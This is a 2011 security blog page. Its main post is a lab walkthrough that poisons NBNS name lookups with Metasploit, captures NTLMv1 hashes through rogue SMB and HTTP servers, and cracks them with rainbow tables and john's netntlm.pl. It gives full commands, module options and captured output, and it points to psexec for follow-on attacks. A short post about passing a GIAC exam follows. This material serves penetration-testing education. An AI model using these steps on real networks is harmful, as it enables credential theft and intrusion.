ipositivesecurity-The-Atlantic: April 2011

Metasploit's NBNS auxillary module in action. I will be using Metasploit Express for the exercise. The objective is to gain access to victim's password.

This video is based on Packetstan's awesome tutorial. Do check it out here for full details:
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

Let's begin..
First we start the Metasploit auxiliary NBNS module:

auxiliary/spoof/nbns/nbns_response

-> NBNS queries are sent out as broadcast. So we will now intercept the requests and send our spoofed NBNS responses to the victim. This will poison the name lookup.

msf auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name     Current Setting Required Description
   ----     --------------- -------- -----------
   REGEX    .*               yes       Regex applied to determene if spoofed reply is sent
   SPOOFIP 172.72.5.1       yes       IP address with which to poison responses
   VERBOSE true             no        Determines whether to display responses

msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) >

As soon as an end-client sends out a name resolution query, our NBNS response server responds back saying it's the one the client is looking for.

[*] Packet Recieved from 172.72.5.139
[*] Regex matched PLAYGROUND1 from 172.72.5.139. Sending reply...

Now that we have controlled the name resolution, we can start rogue / fake services at our end - such as a file server [ smb ], and a web server [ http ].

The idea is to set up these fake services, and capture the hashes when the victim attempts to access them.

Configure and start the following modules:

auxiliary/server/capture/smb

msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required Description
   ----        ---------------   -------- -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788 yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE     /tmp/smblog       no        The local filename to store the captured hashes
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > show options

Module options (auxiliary/server/capture/http_ntlm):

   Name        Current Setting   Required Description
   ----        ---------------   -------- -----------
   CHALLENGE   1122334455667788 yes       The 8 byte challenge
   LOGFILE     /tmp/httplog      no        The local filename to store the captured hashes
   PWFILE                        no        The local filename to store the hashes in Cain&Abel format
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80                yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                 no        The URI to use for this exploit (default is random)

When the user attempts to authenticate / access the SMB / HTTP services, our rogue server responds and the end-client sends it's hashed credentials for getting authenticated.

msf auxiliary(smb) > [*] 2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a

msf auxiliary(http_ntlm) > [*] Packet Recieved from 172.72.5.139
[*] Regex matched SERVER from 172.72.5.139. Sending reply...
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] 172.72.5.139: PLAYGROUND1\Administrator 76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a on PLAYGROUND1

We have configured logging location in module options and these hashes are captured in their respective log files.

root@victor:Tools# cat /tmp/smblog
2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a

root@victor:Tools# cat /tmp/httplog
2011-04-19 16:17:49 +0530:172.72.5.139:PLAYGROUND1:PLAYGROUND1:Administrator:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a

But these hashes are salted with a challenge, which means cracking them is not feasible. For salted hashes, we will use Rainbow tables.

Download the free Rainbow tables here:
ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/

Using rcracki [ http://sourceforge.net/projects/rcracki/ ] and the rainbow tables, we now crack the first half of the LM hash. We only have to take first 16 characters from the LM hash and use it with rcracki_mt as follows:

./rcracki_mt -h <first 16 chars of LM hash> /path/to/rainbowtables/

[ First 16 chars of LM hash in this instance -> 76365e2d142b5612 ]

So the command I run is:

./rcracki_mt -h 76365e2d142b5612 /halflmchall_all-space#1-7_0/

First portion cracked

### output snipped ###

statistics

-------------------------------------------------------

plaintext found: 1 of 1 (100.00%)

total disk access time: 23.17 s

total cryptanalysis time: 16.95 s

total pre-calculation time: 260.47 s

total chain walk step: 199970001

total false alarm: 1669

total chain walk step due to false alarm: 12603773

result

-------------------------------------------------------

76365e2d142b5612 PASSWOR hex:50415353574f52

### output snipped ###

Aha..we have got first portion of the password [ PASSWOR ]. Now we feed this portion of password as a seed to netntlm.pl [ found in john install directory ]. The input file should have the hashes in john-compatible format [ from smblog ] or in the following format from httplog:

<user>:::<LMHASH>:<NTLMHASH>:<Metasploit_static_CHALLENGE>

i.e. in the format as follows ->

root@victor:Tools# cat /tmp/nbns
playground\administrator:::76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a:1122334455667788

netntlm.pl is run as follows:

./netntml.pl --seed <first_portion> --file nbns

root@victor:run#./netntml.pl --seed PASSWOR --file /tmp/nbns

So we have the uppercase password -> PASSWORK

Now we have got the full password. But as we can see here, it is all uppercase. We need to run it through the previous command again - i.e.

root@victor:run#./netntml.pl --seed PASSWORK --file /tmp/nbns

- and we will get the password in it's true case.

Performing NTLM case-sensitive crack for account: playground\administrator.

guesses: 1 time: 0:00:00:00 100.00% (ETA: Tue Apr 12 17:19:56 2011) c/s: 1163 trying: passwork

Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])

passwork (playground\administrator)

We found the true case password -> "passwork" :)
We have the password and can now use it in further attacks such as using psexec.!

Metasploit NBNS Auxilary in action from KG on Vimeo.

Metasploit's Auxilary module netbios name spoofer is very convenient and effective in a pen test. Start the module, then set up fake services like smb / http, and then just lay back n watch hashes pop up...!

Thank You for watching!

Hey fellas,

After around a month's preparation post passing GPEN, I sat for and passed GIAC Incident Handling exam yesterday.

Here is the program detail:

GIAC Certified Incident Handler

This subject teaches about Incident Handling skills, and dives deep into various attack vectors. Also, interesting is to learn how to understand and apply this knowledge to attacks vis-a-vis the 6 Incident Handling phases.

The exam was gripping at all times, and I found a handful of pretty tricky questions in there too. I will not delve any detail on the questions, only that you should have decent experience in most / all the topics mentioned in the syllabii as well as have at least some exposure to handling events / incidents from a high level.

Here is the GCIH certification bulletin:

http://www.giac.org/certbulletin/gcih.php

Day 1 today, and I am already finding this knowledge very helpful. It is comforting to be able to relate methods n thought process of a penetration tester in confirming / exploiting security weaknesses in a customer environment, with the defensive approach of an Incident Handler. This brings out all the worth of GPEN n GCIH cos it is crucial to be able to help customers' infosec / security team understand ways an attacker can get in as well as recommendations pertaining to each of the phases of Incident handling process; i.e. preparation / identification / containment / eradication / recovery and lessons learned. And lastly and equally importantly, as a consultant, you can show the playground and the game to (non-tech) executives.

What say? Go for it!

Best Regards.

ipositivesecurity-The-Atlantic

Wednesday, April 20, 2011

RSS Feed url fixed

Friday, April 15, 2011

Metasploit NBNS Auxiliary FTW

Wednesday, April 6, 2011

Passed GIAC GCIH Exam